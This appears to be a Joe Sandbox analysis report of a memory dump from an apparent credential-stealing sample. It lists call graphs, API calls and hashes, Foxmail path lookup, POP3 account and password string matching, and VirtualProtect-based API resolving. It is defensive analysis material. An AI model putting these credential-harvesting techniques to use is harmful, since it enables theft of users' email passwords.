6314 240c2744 ___scrt_fastfail 6313->6314 6314->6278 6316 240c2491 6315->6316 6317 240c34ea 6316->6317 6318 240c34ef ___vcrt_initialize_winapi_thunks 6317->6318 6337 240c3936 6318->6337 6321 240c34fd 6321->6293 6323 240c3505 6324 240c3510 6323->6324 6351 240c3972 6323->6351 6324->6293 6392 240c7457 6326->6392 6329 240c3529 6330 240c3543 6329->6330 6331 240c3532 6329->6331 6330->6294 6332 240c391b ___vcrt_uninitialize_ptd 6 API calls 6331->6332 6333 240c3537 6332->6333 6334 240c3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6333->6334 6335 240c353c 6334->6335 6396 240c3c50 6335->6396 6338 240c393f 6337->6338 6340 240c3968 6338->6340 6341 240c34f9 6338->6341 6355 240c3be0 6338->6355 6342 240c3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6340->6342 6341->6321 6343 240c38e8 6341->6343 6342->6341 6373 240c3af1 6343->6373 6346 240c38fd 6346->6323 6349 240c3918 6349->6323 6352 240c399c 6351->6352 6353 240c397d 6351->6353 6352->6321 6354 240c3987 RtlDeleteCriticalSection 6353->6354 6354->6352 6354->6354 6360 240c3a82 6355->6360 6357 240c3bfa 6358 240c3c18 InitializeCriticalSectionAndSpinCount 6357->6358 6359 240c3c03 6357->6359 6358->6359 6359->6338 6361 240c3aaa 6360->6361 6365 240c3aa6 __crt_fast_encode_pointer 6360->6365 6361->6365 6366 240c39be 6361->6366 6364 240c3ac4 GetProcAddress 6364->6365 6365->6357 6371 240c39cd try_get_first_available_module 6366->6371 6367 240c3a77 6367->6364 6367->6365 6368 240c39ea LoadLibraryExW 6369 240c3a05 GetLastError 6368->6369 6368->6371 6369->6371 6370 240c3a60 FreeLibrary 6370->6371 6371->6367 6371->6368 6371->6370 6372 240c3a38 LoadLibraryExW 6371->6372 6372->6371 6374 240c3a82 try_get_function 5 API calls 6373->6374 6375 240c3b0b 6374->6375 6376 240c3b24 TlsAlloc 6375->6376 6377 240c38f2 6375->6377 6377->6346 6378 240c3ba2 6377->6378 6379 240c3a82 try_get_function 5 API calls 6378->6379 6380 240c3bbc 6379->6380 6381 240c3bd7 TlsSetValue 6380->6381 6382 240c390b 6380->6382 6381->6382 6382->6349 6383 240c391b 6382->6383 6384 240c3925 6383->6384 6385 240c392b 6383->6385 6387 240c3b2c 6384->6387 6385->6346 6388 240c3a82 try_get_function 5 API calls 6387->6388 6389 240c3b46 6388->6389 6390 240c3b5e TlsFree 6389->6390 6391 240c3b52 6389->6391 6390->6391 6391->6385 6395 240c7470 6392->6395 6393 240c2ada _ValidateLocalCookies 5 API calls 6394 240c24a3 6393->6394 6394->6297 6394->6329 6395->6393 6397 240c3c7f 6396->6397 6399 240c3c59 6396->6399 6397->6330 6398 240c3c69 FreeLibrary 6398->6399 6399->6397 6399->6398 6401 240c24c8 6400->6401 6402 240c24c4 6400->6402 6403 240c2639 ___scrt_fastfail 4 API calls 6401->6403 6405 240c24d5 ___scrt_release_startup_lock 6401->6405 6402->6301 6404 240c2559 6403->6404 6405->6301 7216 240c67bf 7221 240c67f4 7216->7221 7219 240c67db 7220 240c571e _free 20 API calls 7220->7219 7222 240c6806 7221->7222 7223 240c67cd 7221->7223 7224 240c680b 7222->7224 7225 240c6836 7222->7225 7223->7219 7223->7220 7226 240c637b __dosmaperr 20 API calls 7224->7226 7225->7223 7232 240c71d6 7225->7232 7228 240c6814 7226->7228 7230 240c571e _free 20 API calls 7228->7230 7229 240c6851 7231 240c571e _free 20 API calls 7229->7231 7230->7223 7231->7223 7233 240c71e1 7232->7233 7234 240c7209 7233->7234 7235 240c71fa 7233->7235 7236 240c7218 7234->7236 7241 240c8a98 7234->7241 7237 240c6368 _free 20 API calls 7235->7237 7248 240c8acb 7236->7248 7240 240c71ff ___scrt_fastfail 7237->7240 7240->7229 7242 240c8ab8 RtlSizeHeap 7241->7242 7243 240c8aa3 7241->7243 7242->7236 7244 240c6368 _free 20 API calls 7243->7244 7245 240c8aa8 7244->7245 7246 240c62ac _abort 26 API calls 7245->7246 7247 240c8ab3 7246->7247 7247->7236 7249 240c8ad8 7248->7249 7250 240c8ae3 7248->7250 7251 240c56d0 21 API calls 7249->7251 7252 240c8aeb 7250->7252 7258 240c8af4 __dosmaperr 7250->7258 7253 240c8ae0 7251->7253 7254 240c571e _free 20 API calls 7252->7254 7253->7240 7254->7253 7255 240c8b1e RtlReAllocateHeap 7255->7253 7255->7258 7256 240c8af9 7257 240c6368 _free 20 API calls 7256->7257 7257->7253 7258->7255 7258->7256 7259 240c474f __dosmaperr 7 API calls 7258->7259 7259->7258 7701 240c5bff 7709 240c5d5c 7701->7709 7704 240c5c13 7705 240c5b7a __dosmaperr 20 API calls 7706 240c5c1b 7705->7706 7707 240c5c28 7706->7707 7708 240c5c2b 11 API calls 7706->7708 7708->7704 7710 240c5c45 __dosmaperr 5 API calls 7709->7710 7711 240c5d83 7710->7711 7712 240c5d9b TlsAlloc 7711->7712 7713 240c5d8c 7711->7713 7712->7713 7714 240c2ada _ValidateLocalCookies 5 API calls 7713->7714 7715 240c5c09 7714->7715 7715->7704 7715->7705 7260 240c9db8 7261 240c9dbf 7260->7261 7262 240c9e20 7261->7262 7263 240c9ddf 7261->7263 7264 240caa17 21 API calls 7262->7264 7265 240ca90e 7262->7265 7263->7265 7267 240caa17 21 API calls 7263->7267 7266 240c9e6e 7264->7266 7268 240ca93e 7267->7268 6406 240c5630 6407 240c563b 6406->6407 6409 240c5664 6407->6409 6410 240c5660 6407->6410 6412 240c5eb7 6407->6412 6419 240c5688 6409->6419 6413 240c5c45 __dosmaperr 5 API calls 6412->6413 6414 240c5ede 6413->6414 6415 240c5efc InitializeCriticalSectionAndSpinCount 6414->6415 6418 240c5ee7 6414->6418 6415->6418 6416 240c2ada _ValidateLocalCookies 5 API calls 6417 240c5f13 6416->6417 6417->6407 6418->6416 6420 240c5695 6419->6420 6422 240c56b4 6419->6422 6421 240c569f RtlDeleteCriticalSection 6420->6421 6421->6421 6421->6422 6422->6410 6970 240c3370 6981 240c3330 6970->6981 6982 240c334f 6981->6982 6983 240c3342 6981->6983 6984 240c2ada _ValidateLocalCookies 5 API calls 6983->6984 6984->6982 7716 240c63f0 7717 240c6400 7716->7717 7726 240c6416 7716->7726 7718 240c6368 _free 20 API calls 7717->7718 7719 240c6405 7718->7719 7720 240c62ac _abort 26 API calls 7719->7720 7723 240c640f 7720->7723 7721 240c6480 7722 240c4e76 20 API calls 7721->7722 7727 240c64e5 7722->7727 7725 240c64ee 7728 240c571e _free 20 API calls 7725->7728 7726->7721 7729 240c6561 7726->7729 7735 240c6580 7726->7735 7727->7725 7732 240c6573 7727->7732 7746 240c85eb 7727->7746 7728->7729 7755 240c679a 7729->7755 7733 240c62bc _abort 11 API calls 7732->7733 7734 240c657f 7733->7734 7736 240c658c 7735->7736 7736->7736 7737 240c637b __dosmaperr 20 API calls 7736->7737 7738 240c65ba 7737->7738 7739 240c85eb 26 API calls 7738->7739 7740 240c65e6 7739->7740 7741 240c62bc _abort 11 API calls 7740->7741 7742 240c6615 ___scrt_fastfail 7741->7742 7743 240c66b6 FindFirstFileExA 7742->7743 7744 240c6705 7743->7744 7745 240c6580 26 API calls 7744->7745 7748 240c853a 7746->7748 7747 240c854f 7749 240c6368 _free 20 API calls 7747->7749 7750 240c8554 7747->7750 7748->7747 7748->7750 7752 240c858b 7748->7752 7754 240c857a 7749->7754 7750->7727 7751 240c62ac _abort 26 API calls 7751->7750 7752->7750 7753 240c6368 _free 20 API calls 7752->7753 7753->7754 7754->7751 7756 240c67a4 7755->7756 7757 240c67b4 7756->7757 7758 240c571e _free 20 API calls 7756->7758 7759 240c571e _free 20 API calls 7757->7759 7758->7756 7760 240c67bb 7759->7760 7760->7723 6985 240c9e71 6987 240c9e95 6985->6987 6986 240c9f71 __startOneArgErrorHandling 6991 240cb2f0 21 API calls 6986->6991 6992 240cacad __startOneArgErrorHandling 6986->6992 6987->6986 6988 240c9ee6 6987->6988 6990 240c9ef8 6988->6990 6993 240caa53 6988->6993 6991->6992 6994 240caa70 RtlDecodePointer 6993->6994 6996 240caa80 6993->6996 6994->6996 6995 240c2ada _ValidateLocalCookies 5 API calls 6998 240cac67 6995->6998 6997 240cab0d 6996->6997 6999 240caab7 6996->6999 7000 240cab02 6996->7000 6997->7000 7001 240c6368 _free 20 API calls 6997->7001 6998->6990 6999->7000 7002 240c6368 _free 20 API calls 6999->7002 7000->6995 7001->7000 7002->7000 7273 240c3eb3 7274 240c5411 38 API calls 7273->7274 7275 240c3ebb 7274->7275

                  Executed Functions

                  Function 240C10F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 240C1137
                  • lstrcatW.KERNEL32(?,?), ref: 240C1151
                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 240C115C
                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 240C116D
                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 240C117C
                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 240C1193
                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 240C11D0
                  • FindClose.KERNELBASE(00000000), ref: 240C11DB
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                  • String ID:
                  • API String ID: 1083526818-0
                  • Opcode ID: 0abdbecbf72314bb0d9056320449352226571f26f887f1a2255d948e28ac83a3
                  • Instruction ID: ecc222a99483cebc3b9b1b80348497aa8584ea5103039f4648039ce896719195
                  • Opcode Fuzzy Hash: 0abdbecbf72314bb0d9056320449352226571f26f887f1a2255d948e28ac83a3
                  • Instruction Fuzzy Hash: 6821A272904308ABD721EB64DC48F9F7BDCEF84714F10092AFA58D7190EB74D6848B96
                  Function 240C12EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 240C1434
                    • Part of subcall function 240C10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 240C1137
                    • Part of subcall function 240C10F1: lstrcatW.KERNEL32(?,?), ref: 240C1151
                    • Part of subcall function 240C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 240C115C
                    • Part of subcall function 240C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 240C116D
                    • Part of subcall function 240C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 240C117C
                    • Part of subcall function 240C10F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 240C1193
                    • Part of subcall function 240C10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 240C11D0
                    • Part of subcall function 240C10F1: FindClose.KERNELBASE(00000000), ref: 240C11DB
                  • lstrlenW.KERNEL32(?), ref: 240C14C5
                  • lstrlenW.KERNEL32(?), ref: 240C14E0
                  • lstrlenW.KERNEL32(?,?), ref: 240C150F
                  • lstrcatW.KERNEL32(00000000), ref: 240C1521
                  • lstrlenW.KERNEL32(?,?), ref: 240C1547
                  • lstrcatW.KERNEL32(00000000), ref: 240C1553
                  • lstrlenW.KERNEL32(?,?), ref: 240C1579
                  • lstrcatW.KERNEL32(00000000), ref: 240C1585
                  • lstrlenW.KERNEL32(?,?), ref: 240C15AB
                  • lstrcatW.KERNEL32(00000000), ref: 240C15B7
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                  • String ID: )$Foxmail$ProgramFiles
                  • API String ID: 672098462-2938083778
                  • Opcode ID: d6741a0b69cd687a9df7b1593f32ed6cdb68d40a4b67cf1e39a6929a078b7201
                  • Instruction ID: 0a98561821497cd1d9d5148e57b05133691aad51bd066ead1e653aa7ea252ab5
                  • Opcode Fuzzy Hash: d6741a0b69cd687a9df7b1593f32ed6cdb68d40a4b67cf1e39a6929a078b7201
                  • Instruction Fuzzy Hash: 8A81A471A00368AAEB20DBA1DC95FEE7379EF44710F10059AF508EB190EAB15EC5CF95
                  Function 240CC7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetModuleHandleA.KERNEL32(240CC7DD), ref: 240CC7E6
                  • GetModuleHandleA.KERNEL32(?,240CC7DD), ref: 240CC838
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 240CC860
                    • Part of subcall function 240CC803: GetProcAddress.KERNEL32(00000000,240CC7F4), ref: 240CC804
                    • Part of subcall function 240CC803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,240CC7F4,240CC7DD), ref: 240CC816
                    • Part of subcall function 240CC803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,240CC7F4,240CC7DD), ref: 240CC82A
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProcProtectVirtual
                  • String ID:
                  • API String ID: 2099061454-0
                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                  • Instruction ID: e8bfa22fc3adfef55564bb0fa9c42d78725ab5c5ac92fb6061e8efee9ba6cba8
                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                  • Instruction Fuzzy Hash: 7001D210A4D241F8BB115674CC01ABF5FD89B27664B101BA6EE40C61B3D9A085CEC3A6
                  Function 240CC7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 79 240cc7a7-240cc7bc 80 240cc82d 79->80 81 240cc7be-240cc7c6 79->81 82 240cc82f-240cc833 80->82 81->80 83 240cc7c8-240cc7f6 call 240cc7e6 81->83 84 240cc835-240cc83d GetModuleHandleA 82->84 85 240cc872 call 240cc877 82->85 91 240cc86c-240cc86e 83->91 92 240cc7f8 83->92 87 240cc83f-240cc847 84->87 87->87 90 240cc849-240cc84c 87->90 90->82 95 240cc84e-240cc850 90->95 93 240cc866-240cc86b 91->93 94 240cc870 91->94 96 240cc7fa-240cc7fe 92->96 97 240cc85b-240cc85e 92->97 93->91 94->90 99 240cc856-240cc85a 95->99 100 240cc852-240cc854 95->100 102 240cc865 96->102 103 240cc800-240cc80b GetProcAddress 96->103 98 240cc85f-240cc860 GetProcAddress 97->98 98->102 99->97 100->98 102->93 103->80 104 240cc80d-240cc81a VirtualProtect 103->104 105 240cc82c 104->105 106 240cc81c-240cc82a VirtualProtect 104->106 105->80 106->105
                  APIs
                  • GetModuleHandleA.KERNEL32(?,240CC7DD), ref: 240CC838
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 240CC860
                    • Part of subcall function 240CC7E6: GetModuleHandleA.KERNEL32(240CC7DD), ref: 240CC7E6
                    • Part of subcall function 240CC7E6: GetProcAddress.KERNEL32(00000000,240CC7F4), ref: 240CC804
                    • Part of subcall function 240CC7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,240CC7F4,240CC7DD), ref: 240CC816
                    • Part of subcall function 240CC7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,240CC7F4,240CC7DD), ref: 240CC82A
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProcProtectVirtual
                  • String ID:
                  • API String ID: 2099061454-0
                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                  • Instruction ID: dd594d117e4b0c42c8b82bda3d39c6aca18de47488474529c48165bab08180ed
                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                  • Instruction Fuzzy Hash: EE21F76154C281EFFB128B74CC04AAF6FD89B17264F1906A6D940CB163D5A885CDC3A6
                  Function 240CC803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 107 240cc803-240cc80b GetProcAddress 108 240cc82d 107->108 109 240cc80d-240cc81a VirtualProtect 107->109 112 240cc82f-240cc833 108->112 110 240cc82c 109->110 111 240cc81c-240cc82a VirtualProtect 109->111 110->108 111->110 113 240cc835-240cc83d GetModuleHandleA 112->113 114 240cc872 call 240cc877 112->114 115 240cc83f-240cc847 113->115 115->115 117 240cc849-240cc84c 115->117 117->112 118 240cc84e-240cc850 117->118 119 240cc856-240cc85e 118->119 120 240cc852-240cc854 118->120 122 240cc85f-240cc865 GetProcAddress 119->122 120->122 124 240cc866-240cc86e 122->124 126 240cc870 124->126 126->117
                  APIs
                  • GetProcAddress.KERNEL32(00000000,240CC7F4), ref: 240CC804
                  • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,240CC7F4,240CC7DD), ref: 240CC816
                  • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,240CC7F4,240CC7DD), ref: 240CC82A
                  • GetModuleHandleA.KERNEL32(?,240CC7DD), ref: 240CC838
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 240CC860
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: AddressProcProtectVirtual$HandleModule
                  • String ID:
                  • API String ID: 2152742572-0
                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                  • Instruction ID: 88b4b929910665b2f191ea189eced2dfab965d40939996684909bb5f2034e0ef
                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                  • Instruction Fuzzy Hash: 72F0C25164D240FCFA1145B4DC41EBF5FCC8B27660B101A66EE00C71A3D8A5858E83F6

                  Non-executed Functions

                  Function 240C60E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 240C61DA
                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 240C61E4
                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 240C61F1
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: 72df13f8864ad440076ecc9c6c86c04e4bf215d6a64a2a217022a3e875172de4
                  • Instruction ID: 5992570c866db5546f8d0b81b3b7fcb45acef64f5faf3de7fa1926251e857897
                  • Opcode Fuzzy Hash: 72df13f8864ad440076ecc9c6c86c04e4bf215d6a64a2a217022a3e875172de4
                  • Instruction Fuzzy Hash: 3431D37490121CDBCB21DF68D988B8DBBB8EF08710F5041EAE81CA7250EB349BC58F45
                  Function 240C4AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(?,?,240C4A8A,?,240D2238,0000000C,240C4BBD,00000000,00000000,00000001,240C2082,240D2108,0000000C,240C1F3A,?), ref: 240C4AD5
                  • TerminateProcess.KERNEL32(00000000,?,240C4A8A,?,240D2238,0000000C,240C4BBD,00000000,00000000,00000001,240C2082,240D2108,0000000C,240C1F3A,?), ref: 240C4ADC
                  • ExitProcess.KERNEL32 ref: 240C4AEE
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID:
                  • API String ID: 1703294689-0
                  • Opcode ID: 3c9e36ecfa40987c474afa6a4e6037d6bbf37bd15c4fa8b1deb69acc0e7531d7
                  • Instruction ID: 213eb064ec777a82ca693da7e82be23842a21f4bd54140b2bd6cc4d2e0ed0f49
                  • Opcode Fuzzy Hash: 3c9e36ecfa40987c474afa6a4e6037d6bbf37bd15c4fa8b1deb69acc0e7531d7
                  • Instruction Fuzzy Hash: 46E0B636000208EFDF026F68DD08B4D3F69FF40745B604424FA09AB121DB39D9E3DA54
                  Function 240C6580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: .
                  • API String ID: 0-248832578
                  • Opcode ID: 6ff3b42c58ea74413d6a54739d3e8595ca2de97c4fc5c176d2a575a8cc6a4101
                  • Instruction ID: 1a86e1a7b8638bdd0994cafeb54b0df600d1550892deb54d1945900d9d88a5c6
                  • Opcode Fuzzy Hash: 6ff3b42c58ea74413d6a54739d3e8595ca2de97c4fc5c176d2a575a8cc6a4101
                  • Instruction Fuzzy Hash: C4312871900109EFDB249EB8CC84EEE7BBDDF85708F1006BCE919D7295E6309A858B50
                  Function 240C724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: HeapProcess
                  • String ID:
                  • API String ID: 54951025-0
                  • Opcode ID: 232cceaa838faa81f8f352c8785f53a2613dae26b7e2b78ad2dcacd79557dbd0
                  • Instruction ID: 6bdabfcfa465048c56dc09c40f0559d7727e9d93cce011b89b97e9bd3af3eeb1
                  • Opcode Fuzzy Hash: 232cceaa838faa81f8f352c8785f53a2613dae26b7e2b78ad2dcacd79557dbd0
                  • Instruction Fuzzy Hash: 16A01130200202CF83288F38C20A30C3AACEA002803200038B808E0000EB388080AA08
                  Function 240C8EC8 Relevance: .1, Instructions: 63COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: CriticalEnterSection
                  • String ID:
                  • API String ID: 1904992153-0
                  • Opcode ID: 55b46a0442e6038887fc306863e2be4c45cd223fb4e41b9bf9fec577ad4e2ed3
                  • Instruction ID: 37f004176b3f161e93d7c69c91c09272ce3309d8369ad5e821c9e1b80da439ec
                  • Opcode Fuzzy Hash: 55b46a0442e6038887fc306863e2be4c45cd223fb4e41b9bf9fec577ad4e2ed3
                  • Instruction Fuzzy Hash: EE217533C00219DBDB00CF68C480BADB7F1AF6576AF204259E52477294C73999C69B5D
                  Function 240C173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 136 240c173a-240c17fe call 240cc030 call 240c2c40 * 2 143 240c1803 call 240c1cca 136->143 144 240c1808-240c180c 143->144 145 240c19ad-240c19b1 144->145 146 240c1812-240c1816 144->146 146->145 147 240c181c-240c1837 call 240c1ede 146->147 150 240c183d-240c1845 147->150 151 240c199f-240c19ac call 240c1ee7 * 2 147->151 153 240c184b-240c184e 150->153 154 240c1982-240c1985 150->154 151->145 153->154 158 240c1854-240c1881 call 240c44b0 * 2 call 240c1db7 153->158 156 240c1995-240c1999 154->156 157 240c1987 154->157 156->150 156->151 160 240c198a-240c198d call 240c2c40 157->160 170 240c193d-240c1943 158->170 171 240c1887-240c189f call 240c44b0 call 240c1db7 158->171 166 240c1992 160->166 166->156 173 240c197e-240c1980 170->173 174 240c1945-240c1947 170->174 171->170 187 240c18a5-240c18a8 171->187 173->160 174->173 176 240c1949-240c194b 174->176 177 240c194d-240c194f 176->177 178 240c1961-240c197c call 240c16aa 176->178 180 240c1955-240c1957 177->180 181 240c1951-240c1953 177->181 178->166 184 240c195d-240c195f 180->184 185 240c1959-240c195b 180->185 181->178 181->180 184->173 184->178 185->178 185->184 188 240c18aa-240c18c2 call 240c44b0 call 240c1db7 187->188 189 240c18c4-240c18dc call 240c44b0 call 240c1db7 187->189 188->189 198 240c18e2-240c193b call 240c16aa call 240c15da call 240c2c40 * 2 188->198 189->156 189->198 198->156
                  APIs
                    • Part of subcall function 240C1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C1D1B
                    • Part of subcall function 240C1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 240C1D37
                    • Part of subcall function 240C1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C1D4B
                  • _strlen.LIBCMT ref: 240C1855
                  • _strlen.LIBCMT ref: 240C1869
                  • _strlen.LIBCMT ref: 240C188B
                  • _strlen.LIBCMT ref: 240C18AE
                  • _strlen.LIBCMT ref: 240C18C8
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: _strlen$File$CopyCreateDelete
                  • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
